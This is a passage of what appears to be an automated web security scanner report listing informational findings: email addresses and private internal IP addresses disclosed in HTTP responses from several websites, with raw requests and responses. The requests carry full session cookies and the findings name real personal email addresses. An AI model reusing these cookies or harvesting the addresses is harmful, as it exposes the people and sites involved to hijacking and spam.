<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<br />
rino@itinfosec.com<br />
...[SNIP]...
<br />
sales@itinfosec.com <br />
support@itinfosec.com <br />
...[SNIP]...
<br />
Phone : prasad@gammainfowayexalt.com</p>
...[SNIP]...
<br />
Email ID: dragon@kisang.co.kr / mpark@kisang.co.kr
<br />
...[SNIP]...

25.30. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The following email address was disclosed in the response:

--Rating@Mail.ru

Request

Response

25.31. http://www.netsuite.com/portal/javascript/DD_roundies.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/javascript/DD_roundies.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /portal/javascript/DD_roundies.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 16853
Content-Disposition: inline;filename="DD_roundies.js"
NS_RTIMER_COMPOSITE: -1584260967:73686F702D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=UTF-8
Cache-Control: max-age=2390
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.ad
...[SNIP]...

25.32. http://www.praetorian.com/contactus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.praetorian.com
Path:	/contactus.html

Issue detail

The following email address was disclosed in the response:

info@praetorian.com

Request

GET /contactus.html HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 17907
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a href="mailto:info@praetorian.com">info@praetorian.com</a>
...[SNIP]...
<a href="mailto:info@praetorian.com">info@praetorian.com</a>
...[SNIP]...

25.33. http://www.smpone.com/Static-contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Static-contact.html

Issue detail

The following email addresses were disclosed in the response:

hr@smpone.com
sales@smpone.com

Request

Response

25.34. http://www.smpone.com/javascript/common.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/javascript/common.php

Issue detail

The following email addresses were disclosed in the response:

dave@tresware.com
erik@tresware.com

Request

GET /javascript/common.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tres Media Group, Inc. 5105 Hwy 33 Farmingdale,
   NJ 07727 USA 732-751-0253
   erik@tresware.com or dave@tresware.com
*************************************************/

/*************************************************
   This file last updated: 11/19/2008 4:00:08 PM
****************************************
...[SNIP]...

25.35. http://www.stillsecure.com/m/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The following email addresses were disclosed in the response:

bherman@stillsecure.com
sales@stillsecure.com
soc@stillsecure.com
support@stillsecure.com

Request

GET /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/company/testimonials.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.8.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:24 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17059

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<a href="mailto:sales@stillsecure.com">sales@stillsecure.com</a>
...[SNIP]...
<a href="mailto:support@stillsecure.com">support@stillsecure.com</a>
...[SNIP]...
<a href="mailto:bherman@stillsecure.com">bherman@stillsecure.com</a>
...[SNIP]...
<a href="mailto:soc@stillsecure.com">soc@stillsecure.com</a>
...[SNIP]...

25.36. http://www.tresware.com/javascript/bbcode.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/javascript/bbcode.php

Issue detail

The following email address was disclosed in the response:

you@address.com

Request

GET /javascript/bbcode.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...
my_link + "]";
       rgt="[/url]";
       wrapSelection(txtarea, lft, rgt, "Link Name", "Here");
   }
   return;
}

function wrapSelectionWithEmail(txtarea) {
   var my_link = prompt("Enter Email Address:","you@address.com");
   if (my_link != null) {
       lft="[email=" + my_link + "]";
       rgt="[/email]";
       wrapSelection(txtarea, lft, rgt, "Text", "Email");
   }
   return;
}

function wrapSelectionWithImage(txtarea, lft,
...[SNIP]...

25.37. http://www.tresware.com/javascript/common.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/javascript/common.php

Issue detail

The following email addresses were disclosed in the response:

dave@tresware.com
erik@tresware.com

Request

GET /javascript/common.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tres Media Group, Inc. 5105 Hwy 33 Farmingdale,
   NJ 07727 USA 732-751-0253
   erik@tresware.com or dave@tresware.com
*************************************************/

/*************************************************
   This file last updated: 5/23/2008 1:21:13 PM
*************************************************/

...[SNIP]...

25.38. http://www.trucklist.ru/cars/&rnd=7005287 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/&rnd=7005287

Issue detail

The following email address was disclosed in the response:

--Rating@Mail.ru

Request

GET /cars/&rnd=7005287 HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=134141457.1303741282.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=134141457.1874277008.1303741282.1303741282.1303741282.1; __utmc=134141457; __utmb=134141457.1.10.1303741282

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:53:26 GMT
Content-Length: 44657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
<meta htt
...[SNIP]...

...[SNIP]...

25.39. http://www.trucklist.ru/cars/trucks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/trucks

Issue detail

The following email address was disclosed in the response:

--Rating@Mail.ru

Request

Response

25.40. http://www.trucklist.ru/cars/undefined previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/undefined

Issue detail

The following email address was disclosed in the response:

--Rating@Mail.ru

Request

GET /cars/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:38:37 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

...[SNIP]...

25.41. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /webroot/delivery/js/jquery.cookie.js?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:40:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4246
Last-Modified: Thu, 25 Jun 2009 06:27:50 GMT
Connection: keep-alive
Expires: Wed, 25 May 2011 14:40:54 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

26. Private IP addresses disclosed previous next
There are 16 instances of this issue:

http://api.facebook.com/restserver.php
http://games.mochiads.com/c/g/moon-volley/mvolley.swf
http://games.mochiads.com/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf
http://games.mochiads.com/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf
http://my.webalta.ru/public/engine/settings.js
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png
http://tools.manageengine.com/forums/me/forum.php
http://tools.manageengine.com/forums/security-manager/forum.php
https://www.controlscan.com/checkout.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php

26.1. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.37.111

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:19:37 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.37.111
X-Cnection: close
Date: Mon, 25 Apr 2011 15:17:37 GMT
Content-Length: 290

fb_sharepro_render([{"url":"http:\/\/www.eset.com\/us\/home\/smart-security","normalized_url":"http:\/\/www.eset.com\/us\/home\/smart-security","share_count":122,"like_count":99,"comment_count":62,"to
...[SNIP]...

26.2. http://games.mochiads.com/c/g/moon-volley/mvolley.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.mochiads.com
Path:	/c/g/moon-volley/mvolley.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.0.0.105
10.0.0.239

Request

GET /c/g/moon-volley/mvolley.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 75083
Last-Modified: Fri, 15 Oct 2010 08:34:09 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
X-Mochi-Source: 10.0.0.239:3832
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:45:26 GMT
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

CWS
.b..x..}.|TU..9...I.IBo..-^ .T[BHB00. e..;....d3...........Q.&..DE..." .uu......;..d.........!........3#...MH.c....x.B..o.....r..m;m.....w...h..jo0.y..d.....O[?..N..{r.....+.X.o..7....}v.7..;.~..
...[SNIP]...

26.3. http://games.mochiads.com/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.mochiads.com
Path:	/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.0.0.107
10.0.0.238

Request

GET /c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/public/flash/r4/ef_the_game.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 62901
Last-Modified: Tue, 20 Jul 2010 15:00:02 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.238:2874
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:47:29 GMT
Date: Mon, 25 Apr 2011 14:47:29 GMT
Connection: close

CWS .|..x....\T....v.$j...MP..I..i.....$ *."*"2.tZ.3"H.....&.(.@m......Q.3*&.c._....s..w.y......w>.X.v.U.j....."`...Z..F......q.....X]....9....5=iqb......g.&....d.P@..`..;....-....(....i......@ .....@
...[SNIP]...

26.4. http://games.mochiads.com/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.mochiads.com
Path:	/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.0.0.107
10.0.0.236

Request

GET /c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 1428
Last-Modified: Sun, 28 Dec 2008 12:34:04 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.21:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.236:53219
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:46:57 GMT
Date: Mon, 25 Apr 2011 14:46:57 GMT
Connection: close

CWS d...x...Mo.I.........c{.6....'q....$...........HY.
..;..<.3cu..|.@.......>..8,..,.\.....q........8s..4.].T.SU.2.c >.........HD6....w.......F..~7;.+>.....$.....J.8w..'....\...c..................
...[SNIP]...

26.5. http://my.webalta.ru/public/engine/settings.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/settings.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.140.29

Request

GET /public/engine/settings.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
